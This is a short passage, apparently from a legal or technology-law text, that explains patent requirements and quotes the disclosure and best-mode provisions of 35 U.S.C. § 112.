TE AM FL Y
[…] Ideas, which are not protected by copyright, can be protected through a patent. In general, the patent laws protect the functionality of a product or process. A patent can be properly obtained if the invention is new, useful, nonobvious, and disclosed. The patent exchanges a grant of an exclusive monopoly for the invention in return for disclosure. Disclosure is the trigger point for patentability. The disclosure supports the claims of patentability— that is, it sets up the claim that the invention is both new and nonobvious — and also the scope of what can be protected. Thus, 35 U.S.C. § 112 provides: The specification shall contain a written description of the invention, and of the manner and process of making and using it, in such full, clear, concise and exact terms as to enable any person skilled in the art to which it pertains, or with which it is most nearly connected, to make and use the same, and shall set forth the best mode contemplated by the inventor of carrying out his invention. The specification shall conclude with one or more claims particularly pointing out and distinctly claiming the subject matter which the applicant regards as his invention (emphasis added).
A patent, therefore, must disclose the best mode for implementing the invention, a clear written description of the invention, sufficient detail so that a practitioner can understand and make use of the description, and distinct claims, in order for a patent to issue.